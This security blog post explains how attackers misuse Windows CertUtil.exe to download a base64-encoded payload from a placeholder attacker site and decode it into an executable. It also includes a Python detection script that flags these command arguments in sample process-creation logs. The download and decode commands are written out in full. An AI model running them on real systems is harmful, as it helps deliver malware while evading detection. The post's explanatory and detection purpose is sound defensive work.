When a Threat Actor is trying to get a payload onto a box they’ll often use curl and wget, as they’re often present on the endpoint. If they aren’t – or there are considerations of being a little more stealthy – there’s another way to live off the land. Its name is CertUtil.exe. As far as I know it’s present on all modern versions of Windows.
I know what you’re thinking: CertUtil is for managing certificates, what possible use does it have to get a payload onto a box? For ‘reasons’ best left for MS to answer, CertUtil can act as a drop-in replacement for wget. Really.
CertUtil -urlcache -f http://<my dodgy site>/remote_payload.txt local_payload.txt
This command does exactly what you think: it pulls a file from a site I control onto the local box. Maybe the attacker is concerned that their payload will trigger the attention of the SOC. There’s an answer for that too: base64 encoding.
CertUtil -decode local_payload.txt pwn.exe
You should be able to work this one out too. It takes the txt file I downloaded, base64-decodes it, and creates my pwn.exe file.
So there you have it: a hacker’s Swiss army knife built into Windows. My advice to blue teams would be to monitor usage of this executable and to pay particular attention to the command arguments used with it. That’s good advice across the board: the arguments are generally more interesting than the executable. Maybe I’ll do an article on that in the future.
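To show what “watch the arguments, not just the executable” looks like in practice, here is an added Python example (not from the original post) that triages constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 Image and CommandLine fields. It flags only the two CertUtil uses described above, download via -urlcache with a URL and -decode, and lets ordinary certificate-store use through; the sample events and the example.invalid hostname are made up for the example.

```python
from __future__ import annotations
import re

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style
# Image and CommandLine fields); made up for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "CertUtil -urlcache -f http://example.invalid/remote_payload.txt local_payload.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "CertUtil -decode local_payload.txt pwn.exe"},
    # Same download with the '/' switch prefix, mixed case and a quoted output path.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r'certutil.exe /URLCache /F https://example.invalid/a.txt "C:\Users\Public\a.txt"'},
    # Legitimate certificate-store use: same binary, uninteresting arguments.
    {"Image": r"C:\Windows\System32\certutil.exe", "CommandLine": "certutil -store My"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')       # double-quoted token or bare token
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
CERTUTIL_NAMES = {"certutil", "certutil.exe"}

def tokenize(command_line: str) -> list[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(command_line)]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify_certutil(image: str, command_line: str) -> str | None:
    """Return 'download', 'decode' or None. The verdict rests on the arguments,
    not the binary: -urlcache with a URL or -decode are the two uses above;
    both '-' and '/' switch prefixes are accepted, case-insensitively."""
    argv = tokenize(command_line)
    if not argv or {basename(image), basename(argv[0])}.isdisjoint(CERTUTIL_NAMES):
        return None
    switches = {a[1:].lower() for a in argv[1:] if len(a) > 1 and a[0] in "-/"}
    if "urlcache" in switches and any(URL_RE.match(a) for a in argv[1:]):
        return "download"
    if "decode" in switches:
        return "decode"
    return None

def triage(events: list[dict]) -> list[tuple[str, str]]:
    """Return (CommandLine, verdict) for each event that matches either rule."""
    return [(ev["CommandLine"], verdict) for ev in events
            if (verdict := classify_certutil(ev.get("Image", ""), ev["CommandLine"]))]
```

Running triage(SAMPLE_EVENTS) returns three hits (download, decode, download) and ignores the -store and cmd.exe events; in a real pipeline the same logic would run over the OriginalFileName field as well, since the binary can be copied under another name.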
Until then, get downloading with CertUtil.